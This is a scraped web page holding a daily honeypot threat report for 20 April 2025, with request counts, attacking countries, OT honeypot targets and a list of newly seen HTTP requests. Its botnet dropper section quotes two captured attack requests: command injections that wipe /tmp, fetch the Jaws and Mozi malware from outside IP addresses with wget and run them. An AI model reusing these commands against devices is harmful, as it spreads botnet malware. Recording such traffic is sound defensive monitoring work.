Table of Contents

Daily Report: 2025-04-20
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 45 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1792 requests were recorded during the day, originating from 2 different countries, with a peak of 419 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
BG	Germany
US	Germany
SG	Germany
BR	Germany
US	Germany
ID	Germany
AU
US	Dubai
MD	Israel

botnet_dropper_behaviour
#

remote_addr	request
88.244.129.179	GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1
103.48.64.57	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.48.64.57:54038/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
19	7	GET http://apiv4.9hits.com/test HTTP/1.1
82	2	GET /teststream HTTP/1.0
83	2	GET /index.m3u8 HTTP/1.0
91	2	GET /index.m3u8 HTTP/1.1
92	2	GET /10/index.m3u8 HTTP/1.1
93	2	GET /10/index.m3u8 HTTP/1.0
94	2	GET /teststream HTTP/1.1
96	2	GET /playlist.m3u8 HTTP/1.1
97	2	GET /playlist.m3u8 HTTP/1.0
98	2	GET /status.xsl HTTP/1.0
99	2	GET /status HTTP/1.0
109	2	GET /index.html HTTP/1.0
110	2	GET /playlist HTTP/1.1
111	2	GET /playlist HTTP/1.0
113	2	GET /stat HTTP/1.0
114	2	GET /status.xsl HTTP/1.1
166	1	\x00\x0E8E\xE5LZ\xF8\xDB\xE2\x80\x00\x00\x00\x00\x00
203	1	GET /Nmap/folder/check1745131706 HTTP/1.1
353	1	GET /rh1Q HTTP/1.1
371	1	GET /NmapUpperCheck1745131706 HTTP/1.1
379	1	GET /nmaplowercheck1745131706 HTTP/1.1
393	1	GET /Odin/http/call1745160606 HTTP/1.1
394	1	GET /OdinHttpCall1745160606 HTTP/1.1
395	1	GET /odinhttpcall1745160606 HTTP/1.1
399	1	\x00\x0E8\x0B\xB4\xCD\x80\x86\xDF\xFC\xBE\x00\x00\x00\x00\x00
404	1	GET /files/ HTTP/1.1
405	1	GET /home/ HTTP/1.1
412	1	GET /uploads/ HTTP/1.1
423	1	\x04\x01\x01\xBB@\xE9\xA1gadm:12345\x00
424	1	\x04\x01\x01\xBB@\xE9\xA1g\x00
428	1	\x00\x0E8\xC6C\x8D&\xE81\x87Q\x00\x00\x00\x00\x00
440	1	\x00\x0E8\xDEWz\x81`\x8C\xB3\x99\x00\x00\x00\x00\x00
443	1	GET /upload/ HTTP/1.1
468	1	POST /api/user/binLookup?time=1745160677024625528 HTTP/1.1
469	1	GET /api/bin/440393?time=1745160676540185291 HTTP/1.1
474	1	GET /config/index?time=1745159449093169966 HTTP/1.1
489	1	\x00\x0E8\x91 \xF0k,Z\x00\xE5\x00\x00\x00\x00\x00
494	1	POST /api/user/binLookup?time=1745159454820008862 HTTP/1.1
495	1	GET /api/bin/440393?time=1745159454413517897 HTTP/1.1
496	1	GET /config/index?time=1745158712882807311 HTTP/1.1
512	1	GET /Odin/http/call1745140200 HTTP/1.1
513	1	GET /OdinHttpCall1745140200 HTTP/1.1
514	1	GET /odinhttpcall1745140200 HTTP/1.1
516	1	GET /j6Kq HTTP/1.1
518	1	\x00\x0E8h7\xEC\xAA\xD30\xB2\xF1\x00\x00\x00\x00\x00

country_iso_code
#

	number_of_occurence	country_iso_code
0	419	GB
1	312	US
2	215	AU
3	171	SC
4	116	DE
5	89	PL
6	62	RU
7	59	NL
8	51	SG
9	40	MD
10	35	LT
11	29	FR
12	29	UA
13	26	CN
14	16	IL
15	13	BG
16	12	KR
17	11	AO
18	10	JP
19	9	IN
20	8	VN
21	8	CA
22	8	TR
23	7	BE
24	6	GH
25	5	ZA
26	4	MC
27	4	BR
28	4	ID
29	3	HK
30	2	PT
31	2	IT
32	1	TW
33	1	IR
34	1	PA
35	1	HU
36	1	IE
37	1	CL
38	1	KE

Report: 2025-04-19

19 April 2025·395 words

Repport Daily

Report: 2025-04-18

18 April 2025·482 words

Repport Daily

Report: 2025-04-17

17 April 2025·410 words

Repport Daily

	number_of_occurence	country_iso_code
0	419	GB
1	312	US
2	215	AU
3	171	SC
4	116	DE
5	89	PL
6	62	RU
7	59	NL
8	51	SG
9	40	MD
10	35	LT
11	29	FR
12	29	UA
13	26	CN
14	16	IL
15	13	BG
16	12	KR
17	11	AO
18	10	JP
19	9	IN
20	8	VN
21	8	CA
22	8	TR
23	7	BE
24	6	GH
25	5	ZA
26	4	MC
27	4	BR
28	4	ID
29	3	HK
30	2	PT
31	2	IT
32	1	TW
33	1	IR
34	1	PA
35	1	HU
36	1	IE
37	1	CL
38	1	KE

	number_of_occurence	country_iso_code
0	419	GB
1	312	US
2	215	AU
3	171	SC
4	116	DE
5	89	PL
6	62	RU
7	59	NL
8	51	SG
9	40	MD
10	35	LT
11	29	FR
12	29	UA
13	26	CN
14	16	IL
15	13	BG
16	12	KR
17	11	AO
18	10	JP
19	9	IN
20	8	VN
21	8	CA
22	8	TR
23	7	BE
24	6	GH
25	5	ZA
26	4	MC
27	4	BR
28	4	ID
29	3	HK
30	2	PT
31	2	IT
32	1	TW
33	1	IR
34	1	PA
35	1	HU
36	1	IE
37	1	CL
38	1	KE

Daily Report: 2025-04-20#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-04-20
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	419	GB
1	312	US
2	215	AU
3	171	SC
4	116	DE
5	89	PL
6	62	RU
7	59	NL
8	51	SG
9	40	MD
10	35	LT
11	29	FR
12	29	UA
13	26	CN
14	16	IL
15	13	BG
16	12	KR
17	11	AO
18	10	JP
19	9	IN
20	8	VN
21	8	CA
22	8	TR
23	7	BE
24	6	GH
25	5	ZA
26	4	MC
27	4	BR
28	4	ID
29	3	HK
30	2	PT
31	2	IT
32	1	TW
33	1	IR
34	1	PA
35	1	HU
36	1	IE
37	1	CL
38	1	KE